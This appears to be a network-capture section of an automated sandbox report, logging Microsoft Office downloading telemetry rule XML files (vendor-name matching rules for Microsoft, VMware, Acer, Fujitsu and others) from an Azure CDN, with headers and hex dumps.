                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            41192.168.2.54976513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:54 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:54 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 427
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                            x-ms-request-id: 915c1ee4-001e-0079-3000-1712e8000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030854Z-1657d5bbd48xlwdx82gahegw4000000004n00000000084ab
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:54 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            42192.168.2.54977113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 464
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                            x-ms-request-id: 5a59384b-a01e-0053-3602-178603000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd48762wn1qw4s5sd30000000044000000000wnnd
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            43192.168.2.54977013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 415
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                            x-ms-request-id: 27ba9a72-001e-0046-2a01-17da4b000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd482lxwq1dp2t1zwkc0000000480000000000gzu
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            44192.168.2.54976713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 469
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                            x-ms-request-id: e72ec3ca-501e-005b-2401-17d7f7000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd48xdq5dkwwugdpzr000000004n000000000pyfd
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            45192.168.2.54976913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 407
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                            x-ms-request-id: 99ffd5e0-b01e-0053-0101-17cdf8000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd48t66tjar5xuq22r800000004d0000000007aww
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            46192.168.2.54977513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 404
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                            x-ms-request-id: f57b7c9f-801e-00a0-4a13-172196000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd48jwrqbupe3ktsx9w00000004m000000000bsu0
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            47192.168.2.54977213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 494
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                            x-ms-request-id: d3d0b776-b01e-003d-1803-17d32c000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd482tlqpvyz9e93p5400000004h00000000059ht
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            48192.168.2.54977313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 419
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                            x-ms-request-id: 09392ef7-101e-0046-3f05-1791b0000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd48t66tjar5xuq22r800000004cg000000008bf4
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            49192.168.2.54977413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:55 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:55 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 472
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                            x-ms-request-id: 20b36261-201e-006e-7102-17bbe3000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030855Z-1657d5bbd48t66tjar5xuq22r800000004dg000000005keq
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            50192.168.2.54977613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:56 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:56 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                            x-ms-request-id: d112c6a6-a01e-000d-2160-17d1ea000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030856Z-1657d5bbd48f7nlxc7n5fnfzh000000003zg00000000k2a6
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
